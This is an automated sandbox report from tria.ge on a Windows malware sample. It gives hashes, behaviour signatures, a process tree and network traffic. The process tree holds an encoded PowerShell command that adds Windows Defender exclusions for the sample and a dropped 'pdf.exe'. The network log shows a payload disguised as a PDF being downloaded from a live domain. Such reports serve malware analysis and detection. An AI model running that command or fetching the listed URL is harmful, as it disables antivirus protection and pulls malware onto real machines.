Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15/01/2025, 01:13 UTC

General

  • Target

    0720b21aaad77b348c22412e05d26592ddd990fc9f4fc15d3a4ebcc367cb831c.exe

  • Size

    72KB

  • MD5

    931859934bfc8ee06890d1083655e809

  • SHA1

    76cb9714e3a8490de213d12af9659363b263f61f

  • SHA256

    0720b21aaad77b348c22412e05d26592ddd990fc9f4fc15d3a4ebcc367cb831c

  • SHA512

    45afb02e5fb8673104f828d8abfaafb39e9cd1f5e2d66ed5240790e9708a4efaf009f12d5c207fefcb0183e79a3d55043bfae2e7d05281a1cad445d339990269

  • SSDEEP

    1536:EBGx6CUjalmTPh2jVR/USJUPTgjNCYQ3cDGmFiCO:c86Ckwmb8jVR/USJUPT+NCj6Fi7

Score
7/10

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0720b21aaad77b348c22412e05d26592ddd990fc9f4fc15d3a4ebcc367cb831c.exe
    "C:\Users\Admin\AppData\Local\Temp\0720b21aaad77b348c22412e05d26592ddd990fc9f4fc15d3a4ebcc367cb831c.exe"
    1⤵
    • Drops startup file
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /release
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4540
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig /release
        3⤵
        • System Location Discovery: System Language Discovery
        • Gathers network information
        PID:4564
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMAA3ADIAMABiADIAMQBhAGEAYQBkADcANwBiADMANAA4AGMAMgAyADQAMQAyAGUAMAA1AGQAMgA2ADUAOQAyAGQAZABkADkAOQAwAGYAYwA5AGYANABmAGMAMQA1AGQAMwBhADQAZQBiAGMAYwAzADYANwBjAGIAOAAzADEAYwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAwADcAMgAwAGIAMgAxAGEAYQBhAGQANwA3AGIAMwA0ADgAYwAyADIANAAxADIAZQAwADUAZAAyADYANQA5ADIAZABkAGQAOQA5ADAAZgBjADkAZgA0AGYAYwAxADUAZAAzAGEANABlAGIAYwBjADMANgA3AGMAYgA4ADMAMQBjAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABwAGQAZgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABwAGQAZgAuAGUAeABlAA==
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4660
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1072
      2⤵
      • Program crash
      PID:4756

Network

  • flag-us
    DNS
    hlag.cc
    0720b21aaad77b348c22412e05d26592ddd990fc9f4fc15d3a4ebcc367cb831c.exe
    Remote address:
    8.8.8.8:53
    Request
    hlag.cc
    IN A
    Response
    hlag.cc
    IN A
    173.252.167.60
  • flag-us
    GET
    http://hlag.cc/panel/uploads/Lzntegqpz.pdf
    0720b21aaad77b348c22412e05d26592ddd990fc9f4fc15d3a4ebcc367cb831c.exe
    Remote address:
    173.252.167.60:80
    Request
    GET /panel/uploads/Lzntegqpz.pdf HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
    Host: hlag.cc
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: application/pdf
    last-modified: Tue, 14 Jan 2025 00:29:32 GMT
    accept-ranges: bytes
    content-length: 1093640
    date: Wed, 15 Jan 2025 01:13:24 GMT
  • 173.252.167.60:80
    http://hlag.cc/panel/uploads/Lzntegqpz.pdf
    http
    0720b21aaad77b348c22412e05d26592ddd990fc9f4fc15d3a4ebcc367cb831c.exe
    19.7kB
    1.1MB
    424
    810

    HTTP Request

    GET http://hlag.cc/panel/uploads/Lzntegqpz.pdf

    HTTP Response

    200
  • 8.8.8.8:53
    hlag.cc
    dns
    0720b21aaad77b348c22412e05d26592ddd990fc9f4fc15d3a4ebcc367cb831c.exe
    53 B
    69 B
    1
    1

    DNS Request

    hlag.cc

    DNS Response

    173.252.167.60

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1860-0-0x00000000740EE000-0x00000000740EF000-memory.dmp

    Filesize

    4KB

  • memory/1860-1-0x0000000001040000-0x0000000001056000-memory.dmp

    Filesize

    88KB

  • memory/1860-3-0x00000000740E0000-0x00000000747CE000-memory.dmp

    Filesize

    6.9MB

  • memory/1860-2-0x0000000000310000-0x0000000000316000-memory.dmp

    Filesize

    24KB

  • memory/1860-4-0x0000000005ED0000-0x0000000005FE2000-memory.dmp

    Filesize

    1.1MB

  • memory/1860-8-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-12-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-14-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-16-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-18-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-26-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-24-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-22-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-20-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-5-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-10-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-28-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-6-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-30-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-56-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-68-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-66-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-1327-0x00000000740EE000-0x00000000740EF000-memory.dmp

    Filesize

    4KB

  • memory/1860-64-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-62-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-60-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-58-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-1328-0x00000000740E0000-0x00000000747CE000-memory.dmp

    Filesize

    6.9MB

  • memory/1860-1329-0x00000000740E0000-0x00000000747CE000-memory.dmp

    Filesize

    6.9MB

  • memory/1860-55-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-52-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-50-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-48-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-46-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-44-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-42-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-1330-0x0000000005AE0000-0x0000000005B4C000-memory.dmp

    Filesize

    432KB

  • memory/1860-1331-0x0000000005C80000-0x0000000005CEA000-memory.dmp

    Filesize

    424KB

  • memory/1860-40-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-38-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-36-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-34-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-32-0x0000000005ED0000-0x0000000005FDB000-memory.dmp

    Filesize

    1.0MB

  • memory/1860-1332-0x00000000047A0000-0x00000000047EC000-memory.dmp

    Filesize

    304KB

  • memory/1860-1333-0x00000000740E0000-0x00000000747CE000-memory.dmp

    Filesize

    6.9MB

  • memory/1860-1336-0x0000000004DE0000-0x0000000004E34000-memory.dmp

    Filesize

    336KB

  • memory/1860-1339-0x00000000740E0000-0x00000000747CE000-memory.dmp

    Filesize

    6.9MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.